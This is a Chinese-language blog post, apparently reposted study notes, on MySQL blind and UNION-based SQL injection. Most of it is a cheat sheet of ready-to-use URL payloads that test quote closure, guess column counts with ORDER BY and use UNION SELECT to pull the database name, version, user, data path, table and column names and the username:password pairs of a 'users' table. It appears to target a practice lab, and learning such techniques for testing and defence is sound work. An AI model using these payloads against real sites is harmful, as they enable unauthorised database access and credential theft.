mysql 盲注学习
盲注有哪些分类? 总体来讲,盲注分为布尔型和延时型两大类。
收集信息
在爆出的字段值里面可以替换为我们的恶意语句,前期主要是收集信息,包括判断当前数据库是否是root用户,MySQL的版本等,一般收集这些信息常用一些MySQL自带的函数去收集信息:MySQL常用的系统函数
version() #MySQL版本user()
#数据库用户名database() #数据库名@@datadir #数据库路径
@@version_compile_os #操作系统版本
?id=1' (测试是否存在注入,报错说明闭合成功,则存在)
?id=1 (测试是否存在注入,报错说明闭合成功,则存在)
?id=1'-- - (注释后面多余的’limit 0,1 页面正常)
?id=1'order by n-- - (order by 猜列数)
?id=-1’union select 1,2,3-- -
?id=-1’union select 1,2,database()-- - (在页面回显出当前的数据库名字)
?id=-1’union select 1,2,group_concat(table_name) from information_schema.tables where t able_schema=database() -- - (爆出当前数据库的所有表)
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' -- - (爆出目标表的列名)
?id=0‘ union select 1,2,group_concat(username,0x3a,password) from users-- - (爆字段)
查询当前数据库名
id=1' and 1=2 UNION SELECT 1,database(),3 --+
查询MySQL版本
id=1' and 1=2 UNION SELECT 1,2,version() --+
查询数据库用户和路径
id=1' and 1=2 UNION SELECT 1,user(),@@datadir --+
查询表名
database 查询数据库
id=1' and 1=2 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
单引号-数据库
id=1' and 1=2 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
转载
文档信息
- 本文作者:dzxindex
- 本文链接:https://dzxindex.github.io/2022/02/12/security-SQL%E6%B3%A8%E5%85%A5/
- 版权声明:自由转载-非商用-非衍生-保持署名(创意共享3.0许可证)